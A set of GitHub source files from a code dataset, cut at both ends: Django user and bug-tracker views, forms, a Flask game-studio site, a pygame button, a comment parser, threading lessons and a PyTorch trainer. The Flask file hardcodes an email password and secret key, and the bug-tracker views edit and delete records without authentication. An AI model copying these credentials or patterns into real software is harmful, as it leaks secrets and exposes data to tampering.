else:\n context['branch_title'] = 'ทั้งหมด'\n\n return render(request, template_name, context)\n\n\n@ad_required_fbv\ndef user_update_admin_view(request, branch_slug, username):\n if branch_slug == 'all':\n obj = get_object_or_404(USER, username=username)\n else:\n obj = get_object_or_404(USER, branch__slug=branch_slug, username=username)\n form = UserCreateUpdateModelForm(request.POST or None, request.FILES or None, instance=obj)\n if form.is_valid():\n form.save()\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n template_name = 'accounts/update.html'\n context = {\n \"object\": obj,\n 'form': form,\n 'branch_slug': branch_slug,\n }\n if 
obj.branch:\n context['branch_title'] = obj.branch.title\n else:\n context['branch_title'] = 'ทั้งหมด'\n\n return render(request, template_name, context)\n\n\n@ad_required_fbv\ndef user_delete_view(request, branch_slug, username):\n if request.method == \"POST\":\n obj = get_object_or_404(USER, username=username)\n obj.delete()\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n\n@ad_required_fbv\ndef user_bulk_create_view_admin(request, branch_slug):\n branch = Branch.objects.get(slug=branch_slug)\n\n UserFormSet = modelformset_factory(model=USER, form=UserCreateUpdateModelForm)\n\n formset = UserFormSet(request.POST or None, request.FILES or None, queryset=USER.objects.none())\n\n if formset.is_valid():\n\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.branch = branch\n instance.save()\n\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n\n\n context = {\n 'formset': formset,\n 'branch_slug': branch_slug,\n }\n\n if branch:\n context['branch_title'] = branch.title\n else:\n context['branch_title'] = 'ทั้งหมด'\n\n\n return render(request, 'accounts/create_bulk.html', context)\n\n\n@login_required\ndef user_profile_detail_view(request):\n obj = get_object_or_404(USER, username=request.user.username)\n template_name = 'accounts/profile/home.html'\n context = {\"object\": obj}\n return render(request, template_name, context)\n\n\n@login_required\ndef user_profile_update(request):\n form = ProfileUpdate(request.POST or None, request.FILES or None, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('profile:home')\n template_name = 'accounts/profile/update.html'\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n","repo_name":"purintibkaew/final","sub_path":"ims-master/v3/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5300282672","text":"from django import forms\nfrom .models import Resource, Category, Donation, Announcement, Binnacle, Company\nfrom apps.app_users.models import User\nclass ResourceForm(forms.ModelForm):\n class Meta:\n model = Resource\n fields = ['name', 'id_resource']\n labels = {\n 'name':'Nombre de recurso',\n }\n\nclass CategoryForm(forms.ModelForm):\n class Meta:\n model = Category\n fields = ['name', 'id_category', 'photo']\n labels = {\n 'name':'Nombre de categoría',\n 'photo':'Foto de categoría'\n }\n \nclass AnnouncementForm(forms.ModelForm):\n class Meta:\n model = Announcement\n fields = ['id_announ', 'init_date', 'end_date', 'category']\n labels = {\n 'init_date':'Fecha de inicio',\n 'end_date':'Fecha de finalización',\n 'category':'Categoría',\n }\n widgets = {\n 'init_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n 'end_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n }\n \nclass DonationForm(forms.ModelForm):\n class Meta:\n model = Donation\n fields = ['resource_id','amount', 'description']\n labels = {\n 'resource_id':'Recurso',\n 'amount':'Cantidad',\n 'description':'Ingresa una descripción sobre la donación que realizarás.',\n }\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['user_cc', 'full_name', 'email', 'phone', 'birth_date', 'photo']\n widgets = {\n 'birth_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n 'email':forms.EmailInput(attrs={'class':'margin-top-10'})\n }\n labels = 
{\n 'user_cc':'Número de identificación',\n 'full_name':'Nombre completo',\n 'email':'Correo electrónico',\n 'phone':'Número telefónico',\n 'birth_date':'Fecha de nacimiento',\n 'photo':'Foto de perfil',\n \n }\n \nclass BinnacleForm(forms.ModelForm):\n class Meta:\n model = Binnacle\n fields = ['date','description']\n widgets = {\n 'date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n }\n \nclass CompanyForm(forms.ModelForm):\n class Meta:\n model = Company\n fields = ['name', 'nit', 'address', 'phone', 'logo']\n widgets = {\n 'logo': forms.FileInput(attrs={'accept': 'image/*', 'max_size': 10485760}),\n }","repo_name":"ICESI-PI1/Knowledge-Project-Gr5","sub_path":"src/knowledge_project/apps/app_projects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74761791788","text":"import pygame.font\n\n\nclass RetryButton:\n def __init__(self, screen):\n # Gets screen information\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n # Button parameters\n self.width, self.height = 200, 50\n self.button_color = (10, 10, 10)\n\n # Font parameters\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 48)\n\n # Sets the dimensions of the button, and the initial position of the button\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n # Renders the text inside the button and sets the text on the middle of the button\n self.text = self.font.render(\"Retry?\", True, self.text_color, self.button_color)\n self.text_rect = self.text.get_rect()\n self.text_rect.center = self.rect.center\n\n # Builds the button\n def draw_button(self):\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.text, self.text_rect)\n","repo_name":"arkaanashadi/ArkaanAshadi_ITP2017_FinalProject","sub_path":"Final/Classes/RetryButton.py","file_name":"RetryButton.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38187208609","text":"import csv\r\nimport bcrypt as bcrypt\r\nfrom flask_login import LoginManager, UserMixin, login_user, login_required, logout_user\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, TextAreaField, SubmitField, PasswordField, SelectField, RadioField\r\nfrom wtforms.fields.html5 import EmailField\r\nfrom wtforms.validators import InputRequired, Email\r\nfrom flask import Flask, session, redirect, render_template, url_for, flash\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\n\r\n# login initialize\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\nlogin_manager.login_view = 'home'\r\n\r\n# email initialize\r\napp.config['SECRET_KEY'] = 'zahra nikbakht'\r\napp.config['MAIL_SERVER'] = 'smtp.googlemail.com'\r\napp.config['MAIL_PORT'] = 587\r\napp.config['MAIL_USE_TLS'] = True\r\napp.config['MAIL_USERNAME'] = 'soen287website@gmail.com' # enter your email here\r\napp.config['MAIL_DEFAULT_SENDER'] = 'soen287website@gmail.com' # enter your email here\r\napp.config['MAIL_PASSWORD'] = 'Soen287Website' # enter your password here\r\nmail = Mail(app)\r\n\r\n\r\n# function for a protected page where you can see the messages sent by users\r\n@app.route('/messages')\r\n@login_required\r\ndef messages():\r\n prefix = '/static/'\r\n with open('data/messages.csv') as f:\r\n top_list = 
list(csv.reader(f))[1:]\r\n return render_template('messages.html', top_list=top_list, prefix=prefix)\r\n\r\n\r\n# function for homepage, including the login form for admins\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef home():\r\n form = LoginForm()\r\n prefix = '/static/'\r\n if form.validate_on_submit():\r\n user = find_user(form.username.data)\r\n # checking if the credentials are valid to login the admin\r\n if user and bcrypt.checkpw(form.password.data.encode(), user.password.encode()):\r\n flash('Logged in successfully.')\r\n login_user(user)\r\n session['next'] = '/'\r\n return redirect(\"/\")\r\n else:\r\n flash('Incorrect username and password.')\r\n with open('data/top3.csv') as f:\r\n top_list = list(csv.reader(f))[1:4]\r\n return render_template('home.html', top_list=top_list, prefix=prefix, form=form)\r\n\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n\r\n# function for a page for released games\r\n# including ratings for all games which are dynamically calculated based on user reviews\r\n@app.route('/released')\r\ndef released():\r\n bb = 0\r\n ww = 0\r\n tq = 0\r\n kp = 0\r\n count = 0\r\n with open('data/review.csv') as f:\r\n reviewlist = list(csv.reader(f))\r\n\r\n # calculating rating for Black Butterflies\r\n for row in reviewlist: # getting all the rows that include rating for this game\r\n temp = 0\r\n if row and row[0] == \"Black Butterflies\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1]) # adding the scores\r\n bb += (temp / 6.0)\r\n if count != 0:\r\n bb = bb / count # calculating the average score\r\n bb = round(bb, 2)\r\n count = 0\r\n\r\n # calculating rating for Wonder's War\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Wonder's War\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n ww += (temp / 6.0)\r\n if count != 0:\r\n ww = ww / count\r\n ww = round(ww, 2)\r\n count = 0\r\n\r\n # calculating rating for Traitor's Quest\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Traitor's Quest\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n tq += (temp / 6.0)\r\n if count != 0:\r\n tq = tq / count\r\n tq = round(tq, 2)\r\n count = 0\r\n\r\n # calculating rating for Kitty Pop\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Kitty Pop\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n kp += (temp / 6.0)\r\n if count != 0:\r\n kp = kp / count\r\n kp = round(kp, 2)\r\n return render_template('releasedGames.html', bb=bb, ww=ww, tq=tq, kp=kp)\r\n\r\n\r\n@app.route('/wip')\r\ndef wip():\r\n return render_template('wip.html')\r\n\r\n\r\n# function for contact page\r\n# handling contact form\r\n# featuring an email system to send an automatic reply to the user, letting them know that the message is received\r\n@app.route('/contact', methods=['GET', 'POST'])\r\ndef handle_contact():\r\n form = ContactForm()\r\n if form.validate_on_submit():\r\n\r\n # defining the automatic reply message\r\n msg = Message(\"Message Received!\", sender=\"soen287website@gmail.com\", recipients=[str(form.email.data)])\r\n msg.body = \"Hello \" + form.name.data + \"! Your message has been received and we will get back to you soon.\"\r\n mail.send(msg)\r\n flash('Thank you! 
We have sent you a confirmation email.')\r\n # collecting the data of the form and writing it in a .csv file\r\n with open('data/messages.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([form.name.data, form.email.data, form.game.data, form.message.data])\r\n return redirect(url_for('handle_contact'))\r\n else:\r\n return render_template('contact.html', form=form)\r\n\r\n\r\n# function for a review survey (dynamic URL based on the game)\r\n# handles reviews from the user\r\n@app.route('/review/', methods=['GET', 'POST'])\r\ndef review(game):\r\n form = ReviewForm()\r\n if form.validate_on_submit():\r\n flash('Thank you for your participation!')\r\n # collecting the data of the form and writing it in a .csv file\r\n with open('data/review.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(\r\n [game, form.one.data, form.two.data, form.three.data, form.four.data, form.five.data, form.six.data])\r\n return redirect(url_for('home'))\r\n else:\r\n return render_template(\"review.html\", form=form, game=game)\r\n\r\n\r\n# user class (for admins only)\r\nclass User(UserMixin):\r\n def __init__(self, username, password=None):\r\n self.id = username\r\n self.password = password\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n user = find_user(user_id)\r\n if user:\r\n user.password = None\r\n return user\r\n\r\n\r\ndef find_user(username):\r\n with open('data/users.csv') as f:\r\n for user in csv.reader(f):\r\n if username == user[0]:\r\n return User(*user)\r\n return None\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n flash('Logged out successfully')\r\n return redirect('/')\r\n\r\n\r\n# the contact form included in contact page\r\nclass ContactForm(FlaskForm):\r\n name = StringField(validators=[InputRequired()])\r\n email = EmailField(validators=[InputRequired(), Email()])\r\n message = TextAreaField(validators=[InputRequired()], render_kw={'rows': 7})\r\n game = SelectField(validators=[InputRequired()],\r\n choices=[('Black Butterflies', 'Black Butterflies'), (\"Wonder's War\", \"Wonder's War\"),\r\n (\"Traitor's Quest\", \"Traitor's Quest\"), (\"Kitty Pop\", \"Kitty Pop\"),\r\n (\"Salad Story\", \"Salad Story\"),\r\n (\"Dream of Desert\", \"Dream of Desert\"), (\"Unreality\", \"Unreality\")])\r\n submit = SubmitField('Submit')\r\n\r\n\r\n# the login form included in homepage\r\nclass LoginForm(FlaskForm):\r\n username = StringField('Username', validators=[InputRequired()])\r\n password = PasswordField('Password', validators=[InputRequired()])\r\n submit = SubmitField('Login')\r\n\r\n\r\n# review form\r\nclass ReviewForm(FlaskForm):\r\n one = RadioField('What do you think about the story?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n two = RadioField('What do you think about the music?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n three = RadioField('What do you think about the general gameplay?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n four = RadioField('What do you think about the characters?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n five = RadioField('If a friend asked you how the game was, what would you say?', 
validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n six = RadioField('How was the game compared to other games that you have played in the same genre?',\r\n validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n submit = SubmitField('submit')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"zahranikbakht/Website_Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24251814183","text":"import re\n\nclass Comment:\n def __init__(self, sheet:str, cell:str, ex:str, dt:str, txt:str):\n self.sheet = sheet\n self.cell = cell\n self.exercise = ex\n self.datetime = dt\n self.comment = txt\n\n def print_comment(self):\n print(\n f\"\\tSheet: {self.sheet}\\n\",\n f\"\\tCell: {self.cell}\\n\",\n f\"\\tCell Data: {self.exercise}\\n\",\n f\"\\tTime-Stamp: {self.datetime}\\n\",\n f\"\\tComment: {self.comment}\"\n )\n\nclass RawCommentFile:\n USERS = \"|\".join((\"Lewis W\",\"Lewis Waite\"))\n MONTHS = \"|\".join((\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"))\n # Eventually move into a sheets request\n SHEETS = \"|\".join((\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\",\"Exercises\"))\n RAW_REGEX = (\n fr'(({USERS})\\n({SHEETS})\\n,\\n([A-Z]{{1,2}}'\n fr'[0-9]{{1,3}})\\n\\|\\n([A-Za-z0-9 .,:-;()-]*)'\n fr'\\n+({USERS}))?\\n({USERS})\\n([0-9]{{1,2}}'\n fr'\\:[0-9]{{1,2}} [AMPM]{{2}} ({MONTHS}) '\n fr'[0-9]{{1,2}})\\n*([A-Za-z0-9 !?,.:-;\\'()-]*)'\n )\n\n def __init__(self, raw_comments:str):\n self.comment = raw_comments\n # Comment store\n self.parsed_comments = self.parse_comment()\n \n def parse_comment(self):\n parsed_comments = []\n self.extracted_input = re.findall(\n self.RAW_REGEX, \n self.comment\n )\n self.cleaned_input = [\n (p[2], p[3], p[4], \n p[7].replace('\\u202f',''),\n p[9]) for p in self.extracted_input\n ]\n\n # Only the top comment has the meta data\n # Store the rolling meta-data variables\n r_sheet=None\n r_cell=None\n r_exercise=None\n for com in self.cleaned_input:\n try:\n # Set the current variables\n c_sheet=com[0]\n c_cell=com[1]\n c_exercise=com[2]\n # If the above values are empty in this comment\n if all([\n c_sheet=='',\n c_cell=='',\n c_exercise==''\n ]):\n # If rolling variables haven't been set yet\n if all([\n r_sheet==None,\n r_cell==None,\n r_exercise==None\n ]):\n # The comment file hasn't reached its first value\n continue\n\n # Then take the values from the latest found\n c_sheet=r_sheet\n c_cell=r_cell\n c_exercise=r_exercise \n else:\n # Reset the rolling variables\n r_sheet=c_sheet\n r_cell=c_cell\n r_exercise=c_exercise\n\n c_date = com[3]\n c_txt = com[4]\n\n comment = Comment(\n sheet=c_sheet, \n cell=c_cell, \n ex=c_exercise, \n dt=c_date, \n txt=c_txt\n )\n parsed_comments.append(comment)\n except KeyError:\n print(\"Issue with regex string\")\n \n return(parsed_comments)\n \nclass APIComment:\n \"\"\"\n Not currently viable through the Google API\n \"\"\"\n def __init__(self):\n return","repo_name":"lewisjacques/FitnessProgram","sub_path":"comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"40129517726","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nimport pygeoip\nfrom bugform.forms import BugForm, AdminForm, SimpleTable, SearchForm, EditForm\nfrom bugform.models import BugModel, AdminModel\nimport django_tables2 as tables \nfrom django_tables2 import RequestConfig\nfrom ipware.ip import get_ip\nfrom django.contrib.auth.decorators import login_required\n\ndef loginuser(request):\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('username', False)\n\t\tpassword = request.POST.get('password', False)\n\t\tuser = authenticate(username=username, password=password)\n\t\tif user is not None:\n\t\t\tlogin(request, user)\n\t\t\treturn admin(request)\n\t\telse:\n\t\t\treturn HttpResponse('You are dead!')\n\tif request.user.is_authenticated() and request.method == 'GET':\n\t\treturn admin(request)\n\telse:\n\t\tform = AdminForm()\n\t\treturn render(request, 'adminform.html', {'form': form})\n\n@login_required\ndef admin(request):\n\tq = BugModel.objects.all()\n\ttable = SimpleTable(q)\n\tRequestConfig(request).configure(table)\n\treturn render(request, 'bugreports.html', {'table':table} )\n\ndef index(request):\n\tif request.method == 'POST':\n\t\tform = BugForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\ttemplate = 'postform.html'\n\t\t\treturn render(request, template)\n\n\telse:\n\t\tip = get_ip(request)\n\t\tgeocity = pygeoip.GeoIP('GeoLiteCity.dat')\n\t\tcity = geocity.record_by_addr(ip)\n\t\tvideo_quality = request.GET.get('quality', None)\n\t\tvideo_format = request.GET.get('format', None)\n\t\tstream_title = request.GET.get('path', None)\n\t\tdata = {'ip':ip, \n\t\t\t'city': city['city'],\n\t\t\t'country': city['country_name'],\n\t\t\t'timezone': city['time_zone'],\n\t\t\t'video_format': video_format,\n\t\t\t'video_quality': video_quality,\n\t\t\t'stream_title': stream_title\n\t\t}\n\t\t\n\t\tform = BugForm(initial=data)\n\t\t\n\treturn render(request, 'data.html', { 'form': form, })\n\t\ndef bug_search(request):\n\tif request.method == 'POST':\n\t\tdesc = request.POST.get('desc')\n\t\tq = BugModel.objects.filter(desc__icontains=desc)\n\t\ttable = SimpleTable(q)\n\t\tRequestConfig(request).configure(table)\n\t\treturn render(request, 'bugreports.html', {'table':table} )\n\telse:\n\t\tform = SearchForm()\n\t\treturn render(request, 'bug_search.html', {'form' : form} )\n\t#return HttpResponse('My mind palace')\n\ndef bug_edit(request, pk):\n\tif request.method == 'POST':\n\t\trecord = BugModel.objects.get(pk=pk)\n\t\tform = EditForm(request.POST, instance=record)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('../../admin')\n\n\telse:\n\t\trecord = BugModel.objects.get(pk=pk)\n\t\tdata = {\n\t\t\t'date':record.date,\n\t\t\t'email': record.email,\n\t\t\t'desc': record.desc,\n\t\t\t'os': record.os,\n\t\t\t'browser': record.browser,\n\t\t\t'loadtime': record.loadtime,\n\t\t\t'ip': record.ip, \n\t\t\t'city': record.city,\n\t\t\t'country': record.country,\n\t\t\t'timezone': record.timezone,\n\t\t\t'netspeed': record.netspeed,\n\t\t\t'bugstatus': record.bugstatus,\n\t\t\t'bugpriority': record.bugpriority\n\t\t}\n\t\t\n\t\tform = EditForm(initial=data)\n\treturn render(request, 'editbugform.html', { 'form': form, })\n\t\ndef bug_delete(request, pk):\n\trecord = BugModel.objects.get(pk=pk)\n\trecord.delete()\n\treturn HttpResponseRedirect('../../admin')\n\t\t\ndef 
logout_user(request):\n\tlogout(request)\n\treturn index(request)\n","repo_name":"Niharika29/bugtracker","sub_path":"bugtracker/bugform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71045735467","text":"# Write a Python program to check a list is empty or not\n\nlst = [34,45,6,5,4,56,7]\n\ndef lie(l):\n    if l:\n        print('List is not empty')\n    else:\n        print('List is empty')\n\nlie(lst)\nlie([])\n\n# using len function\ndef len_lie(l):\n    print('List is empty' if len(l)==0 else 'List is not empty')\n    \nlen_lie(lst)\nlen_lie([])","repo_name":"Tashish97/Data-Science","sub_path":"Python_Practice/Lists/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39395723474","text":"'''\nTemplate tags for paypal offsite payments\n'''\nfrom paypal.standard.forms import PayPalPaymentsForm, PayPalEncryptedPaymentsForm\nfrom django import template\nfrom django.template.loader import render_to_string\n\nregister = template.Library()\n\nclass PayPalNode(template.Node):\n    def __init__(self, integration, encrypted=False):\n        self.integration = template.Variable(integration)\n        self.encrypted = encrypted\n\n    def render(self, context):\n        int_obj = self.integration.resolve(context)\n        if self.encrypted:\n            form_class = PayPalEncryptedPaymentsForm\n        else:\n            form_class = PayPalPaymentsForm\n        form_str = render_to_string(\"billing/paypal.html\", \n                                    {\"form\": form_class(initial=int_obj.fields),\n                                     \"integration\": int_obj}, context)\n        return form_str\n\n\n@register.tag\ndef paypal(parser, token):\n    try:\n        tag, int_obj = token.split_contents()\n    except ValueError:\n        raise template.TemplateSyntaxError(\"%r was expecting a single argument\" %token.split_contents()[0])\n    return PayPalNode(int_obj)\n\n\n@register.tag\ndef paypal_encrypted(parser, token):\n    try:\n        tag, int_obj = token.split_contents()\n    except ValueError:\n        raise template.TemplateSyntaxError(\"%r was expecting a single argument\" %token.split_contents()[0])\n    return PayPalNode(int_obj, encrypted=True)\n","repo_name":"renjithraj2005/merchant","sub_path":"billing/templatetags/paypal_tags.py","file_name":"paypal_tags.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37459493602","text":"# @Time : 2022/01/25 21:31\n# @Author : ╰☆H.侠ゞ\n# -*-coding=utf-8-*-\n# =============================================================\nimport os\nimport threading\nimport time\n\n\n\"\"\"\nThreads run interleaved: the next thread starts executing before the previous one has finished\n\"\"\"\n\n#\n# def task():\n#     time.sleep(5)\n\n\n# The main thread and the child threads are executed in an interleaved way: the timing code [end_time - start_time] does not wait for the two child threads to finish, nor for their two 5-second sleep(5) pauses,\n# it starts running the moment the threads are started. That is what interleaving means, like a clown juggling apples\n# def main(): # main thread\n#     start_time = time.time() # current time, i.e. the thread start time\n#     thread1 = threading.Thread(target=task) # child thread 1\n#     thread2 = threading.Thread(target=task) # child thread 2\n#     thread1.start()\n#     thread2.start()\n#     end_time = time.time() # current time, i.e. the thread end time\n#     print(end_time - start_time) #\n#\n#\n# if __name__ == '__main__':\n#     main()\n\n\n# ==========================================================================================================\nprint(\"=====================================================================================================\")\n# 
==========================================================================================================\n\n\"\"\"\nThe effect of adding join(): the preceding threads must finish executing before the following code can run\n\"\"\"\n\n\ndef task(name):\n    print('Run child process %s (%s)...' % (name, os.getpid())) # os.getpid() gets the process id\n    time.sleep(5)\n\n\ndef main(): # main thread\n    start_time = time.time() # current time, i.e. the thread start time\n    thread1 = threading.Thread(target=task, args=('test1',)) # child thread 1\n    thread2 = threading.Thread(target=task, args=('test2',)) # child thread 2\n    # the code below must not continue until the two child threads have finished executing\n    thread1.start()\n    thread2.start()\n    thread1.join() # wait for child thread 1 to finish before continuing\n    thread2.join() # wait for child thread 2 to finish before continuing\n    end_time = time.time() # current time, i.e. the thread end time\n    print(end_time - start_time) #\n\n\nif __name__ == '__main__':\n    main()","repo_name":"superlff888/projectScripts","sub_path":"Lesson_22/python编程语言与框架/录播/python编程语言/多进程与多线程/multi_thread/multiThread.py","file_name":"multiThread.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3508067483","text":"\"\"\"\nsource:\nhttps://stackoverflow.com/questions/65498782/how-to-dump-confusion-matrix-using-tensorboard-logger-in-pytorch-lightning\nhttps://pytorch-lightning.readthedocs.io/en/latest/starter/introduction_guide.html\n\"\"\"\n\nimport torch\nfrom PIL import Image, ImageFile\nfrom torch.utils.data.sampler import Sampler\nfrom sklearn.metrics import confusion_matrix\nfrom torchvision import datasets, models, transforms\nimport torchvision\nimport os\nimport pytorch_lightning as pl\nfrom pytorch_lightning import Trainer\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom pathlib import Path\nimport torch.nn as nn\nimport cv2\nimport numpy as np\nimport json\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom kjn_face_id_system.optims.Adam import AdamW_GCC2\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\nImage.MAX_IMAGE_PIXELS = None\n\n\nclass AlbumentationsTransform:\n    def __init__(self, augmentation={}):\n        self.img_transforms = A.Compose(\n            [\n                A.Resize(224, 224),\n                A.RGBShift(),\n                A.HorizontalFlip(p=0.5),\n                A.VerticalFlip(p=0.2),\n                A.ChannelShuffle(0.5),\n                A.ColorJitter(p=0.3),\n                A.Cutout(\n                    num_holes=3,\n                    max_h_size=24,\n                    max_w_size=24,\n                    fill_value=0,\n                    always_apply=False,\n                    p=0.5,\n                ),\n                A.ShiftScaleRotate(\n                    scale_limit=0.5, rotate_limit=0, shift_limit=0.1, p=1, border_mode=0\n                ),\n                A.PadIfNeeded(\n                    min_height=224, min_width=224, always_apply=True, border_mode=0\n                ),\n                A.IAAAdditiveGaussianNoise(p=0.2),\n                A.IAAPerspective(p=0.3),\n                A.ShiftScaleRotate(border_mode=cv2.BORDER_CONSTANT, p=0.3),\n                A.RandomBrightnessContrast(p=0.3),\n                A.OneOf(\n                    [\n                        A.CLAHE(p=1),\n                        A.RandomBrightness(p=1),\n                        A.RandomGamma(p=1),\n                    ],\n                    p=0.3,\n                ),\n                A.OneOf(\n                    [\n                        A.IAASharpen(p=1),\n                        A.Blur(blur_limit=3, p=1),\n                        A.MotionBlur(blur_limit=3, p=1),\n                    ],\n                    p=0.3,\n                ),\n                A.OneOf(\n                    [\n                        A.RandomContrast(p=1),\n                        A.HueSaturationValue(p=1),\n                    ],\n                    p=0.3,\n                ),\n                A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n                ToTensorV2(),\n            ]\n        )\n\n    def __call__(self, img):\n        img = np.array(img)\n        return self.img_transforms(image=img).copy()\n\n\nclass ImbalancedDatasetSampler(Sampler):\n    \"\"\"Samples elements randomly from a given list of indices for imbalanced dataset\n    Arguments:\n        indices (list, optional): a list of indices\n        num_samples (int, optional): number of samples to draw\n        callback_get_label func: a callback-like function which takes two arguments - 
dataset and index\n        \"\"\"\n\n    def __init__(\n        self, dataset, indices=None, num_samples=None, callback_get_label=None\n    ):\n        self.indices = list(range(len(dataset))) if indices is None else indices\n        self.callback_get_label = callback_get_label\n        self.num_samples = len(self.indices) if num_samples is None else num_samples\n        label_to_count = {}\n        for idx in self.indices:\n            label = self._get_label(dataset, idx)\n            if label in label_to_count:\n                label_to_count[label] += 1\n            else:\n                label_to_count[label] = 1\n        weights = [\n            1.0 / label_to_count[self._get_label(dataset, idx)] for idx in self.indices\n        ]\n        self.weights = torch.DoubleTensor(weights)\n\n    def _get_label(self, dataset, idx):\n        return dataset[idx][1]\n\n    def __iter__(self):\n        return (\n            self.indices[i]\n            for i in torch.multinomial(self.weights, self.num_samples, replacement=True)\n        )\n\n    def __len__(self):\n        return self.num_samples\n\n\nclass UniversaClassificationTrainer(pl.LightningModule):\n    def __init__(\n        self,\n        hparams={\n            \"epochs_num\": 100,\n            \"batch_size\": 64,\n            \"lr\": 0.0002,\n            \"train_valid_test_split\": [0.9, 0.05, 0.05],\n        },\n        model_type=\"resnet50\",\n        dataset_path=\"dataset\",\n        folders_structure={\n            \"models_folder\": str(Path(__file__).parent / \"models\"),\n            \"graph_folder\": str(Path(__file__).parent / \"graph_folder\"),\n            \"confusion_matrix_folder\": str(Path(__file__).parent / \"confusion_matrix\"),\n            \"test_img_folder\": str(Path(__file__).parent / \"test_img_folder\"),\n            \"metadata_json_folder\": str(Path(__file__).parent / \"metadata_json\"),\n        },\n    ):\n        super().__init__()\n        self.metadata_dict = {}\n        self._hparams = hparams\n        self.model_type = model_type\n        self.dataset_path = dataset_path\n        self.model = self._load_specific_model()\n        self.img_transforms = transforms.Compose([AlbumentationsTransform()])\n        self.criterion = nn.CrossEntropyLoss()\n        self.folders_structure = folders_structure\n        self._split_dataset_to_dataloaders_and_return_classes()\n\n    def _load_specific_model(self):\n      